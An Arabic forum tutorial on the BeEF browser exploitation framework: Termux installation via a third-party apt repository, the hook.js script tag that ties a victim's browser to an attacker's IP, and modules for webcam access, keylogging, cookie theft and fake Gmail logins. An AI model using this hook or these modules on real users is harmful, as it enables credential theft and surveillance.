أداة BeEF لاختراق المتصفحات واختبار XSS

x32x01
  • بواسطة x32x01 ||
  • #1
مع زيادة الهجمات اللي بتيجي من الويب مباشرة على المستخدمين 📱💻، أداة BeEF بقت من أقوى الأدوات اللي أي Pentester لازم يفهمها كويس.
الأداة دي بتخلّيك تختبر الأمان الحقيقي للبيئة المستهدفة من زاوية مختلفة جدًا: متصفح الويب نفسه 🌐.

BeEF بتشتغل على فكرة إن المتصفح هو أضعف حلقة، حتى لو النظام نفسه متأمّن 🔓.

🧠 ليه المتصفح سطح هجوم خطير؟​

الناس بتستخدم المتصفح في كل حاجة تقريبًا:
  • حسابات بنكية 💳
  • إيميلات 📧
  • سوشيال ميديا 📱
  • بيانات شخصية 😬
وده بيخلّي المتصفح هدف مثالي لأي مهاجم، لأن الضحية غالبًا:
  • مش حاسس إنه اتصاب
  • بيدخل بياناته بنفسه
  • وبيسمح بإذونات من غير تركيز


⚙️ إيه هي أداة BeEF بالظبط؟​

BeEF (Browser Exploitation Framework) هو إطار هجوم متخصص في اختراق متصفحات الويب.
بعكس أدوات تانية بتركّز على السيرفر أو الشبكة، BeEF بتدخل من باب مفتوح: المتصفح 🧨.
📌 ممكن كمان تستخدم BeEF مع Metasploit علشان سيناريوهات هجوم أعقد.

🧑‍💻 مين اللي طور BeEF؟​

الأداة اتطورت على إيد فريق مطورين بقيادة Wade Alcorn، ومبنية باستخدام Ruby on Rails.
وهي ممتازة جدًا في:
  • اختبار ثغرات XSS 🔥
  • هجمات الحقن (Injection)
  • الهندسة الاجتماعية 🎭

🎯 BeEF بتعمل إيه مع الضحية؟​

بعد ما تربط متصفح الضحية:
  • 📸 تفتح الكاميرا
  • ⌨️ تراقب ضغطات الكيبورد
  • 🍪 تجمع الكوكيز
  • 🌍 تمسح الشبكة الداخلية
  • 🎣 تشغّل صفحات تصيّد احترافية
وكل ده من جوه المتصفح نفسه 😈.


📲 تثبيت BeEF على Termux​

🔄 تحديث apt​

Code: 
apt update

⚙️ إضافة source الخاص بالتثبيت​

Code: 
mkdir -p $PREFIX/etc/apt/sources.list.d
printf "deb https://hax4us.github.io/TermuxBlack/ termuxblack main" > $PREFIX/etc/apt/sources.list.d/termuxblack.list

🔐 إضافة شهادة المصدر​

Code: 
apt install -y gpg
wget -q https://hax4us.github.io/TermuxBlack/termuxblack.key -O termuxblack.key
apt-key add termuxblack.key

🔄 تحديث السورس​

Code: 
apt-get update -yq --silent

⬇️ تثبيت BeEF​

Code: 
apt install -y beef-xss
📌 سيب الإنترنت شغال لحد ما التثبيت يخلص.


▶️ تشغيل BeEF​

Code: 
beef
هتظهرلك رسالة تطلب منك تغيّر الباسورد الافتراضي 🔑.

واجهة التحكم:
Code: 
http://127.0.0.1:3000/ui/panel
Hook المستخدم لربط المتصفح:
Code: 
<script src="http://<IP>:3000/hook.js"></script>


🔗 ربط متصفح الهدف (Hook)​

مفتاح النجاح في BeEF هو إنك تخلّي الضحية تزور صفحة فيها hook.js.
للتجربة المحلية:
Code: 
http://127.0.0.1:3000/demos/basic.html
بمجرد ما المتصفح يتربط، هيظهر عندك في قائمة Hooked Browsers 🧲.


🔍 عرض تفاصيل المتصفح​

من تبويب Details تقدر تشوف:
  • نوع المتصفح
  • نظام التشغيل
  • الإضافات
  • WebRTC / WebGL
  • معلومات تقنية كتير جدًا 🧠


💣 تنفيذ الأوامر داخل المتصفح​

BeEF فيها أكتر من 300 Module 🔥، منهم:
  • 📜 معرفة المواقع اللي اتزارت
  • 📷 تشغيل الكاميرا
  • 🍪 سرقة الكوكيز
  • 🎣 Google Phishing
  • 🖼️ Screenshot

🎭 مثال: Google Phishing​

بعد تنفيذ الموديول:
  • الضحية يشوف صفحة Gmail مزيفة
  • يدخل الإيميل والباسورد
  • البيانات تتسجل عندك
  • ويتحوّل لموقع Google الحقيقي 😈


⚠️ الخلاصة والتحذير​

BeEF أداة قوية وخطيرة جدًا 💥
وهي مثال حي ليه:
  • ما تضغطش على لينكات مش موثوقة
  • ما تديش إذن للكاميرا أو المايك بسهولة
  • خلي بالك من أي صفحة تسجيل دخول مش طبيعية
الأداة ممتازة للتعلّم والـ Ethical Hacking فقط ✅.
 
التعديل الأخير:

المواضيع ذات الصلة

x32x01
أوامر Termux الأساسية: قائمة سريعة للمبتدئين!
  • x32x01
الردود
0
المشاهدات
2K
x32x01
x32x01
x32x01
الأداة RouterSploit بيئة متكاملة لأختراق الراوتر
  • x32x01
الردود
0
المشاهدات
2K
x32x01
x32x01
x32x01
تهيئة تيرمكس لأدوات الاختراق والاختبارات شامل!
  • x32x01
الردود
0
المشاهدات
1K
x32x01
x32x01
x32x01
شرح أداة MBF لهجوم التخمين
  • x32x01
الردود
0
المشاهدات
1K
x32x01
x32x01
x32x01
شرح أداة Hydra لهجوم التخمين على البروتوكولات!
  • x32x01
الردود
0
المشاهدات
982
x32x01
x32x01
الوسوم : الوسوم
beef ethical hacking metasploit termux أمن التطبيقات اختبار الاختراق اختراق المتصفحات الهندسة الاجتماعية ثغرة xss حقن الأكواد
الدخول أو التسجيل السريع
نسيت كلمة مرورك؟

آخر المشاركات

أحدث المنتجات

إحصائيات المنتدى
المواضيع
2,388
المشاركات
2,601
أعضاء أكتب كود
574
أخر عضو
الياس
عودة
أعلى